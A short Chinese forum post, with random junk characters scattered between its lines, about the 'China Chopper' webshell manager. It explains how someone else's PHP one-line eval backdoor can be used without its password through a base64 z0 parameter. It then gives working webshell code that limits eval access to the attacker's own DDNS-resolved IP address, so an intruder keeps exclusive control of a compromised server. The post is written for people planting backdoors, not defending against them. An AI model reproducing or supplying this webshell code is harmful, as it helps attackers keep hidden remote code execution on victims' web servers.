今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
7 x7 K0 S7 c# u& p0 f! y: X9 q
( ?9 X+ I* V- I8 {# V4 R: H8 w+ G就算你设置了密码,使用了eval($_REQUEST['moyo']); z# Q( a* @8 v& J
1 ~9 d/ D; R4 v( Z
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
& z w+ \% { y3 B# ^
7 _( D; K1 u6 J) J因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));4 K' f& K& `1 K, g
$ h) k) d6 `+ H9 G. }, y
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了9 U+ T: P) B4 \ T6 l4 U
5 \. ~7 }, v, m# _8 W$ L" Y不知道是设计缺陷还是故意留的后门
: L# j# H# E& D3 w, m8 q; t# N u' O
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
3 P/ J% z( J! Q5 H
, f f& V& o8 C( k9 g本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
m% z- {* D; i) z& H
. \. O) j* Z* M$ u2 l然后一句话后门这样写) o3 M" {( S9 ^
8 M6 ?/ ?& I1 X
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>6 Z+ g% P8 S. }6 D! V6 T9 f5 \
这样就可以让一句话后门只允许自己的电脑连接了
: X2 P0 d5 [. C. r: ^
" B$ N6 B ]* n0 L# O% ? |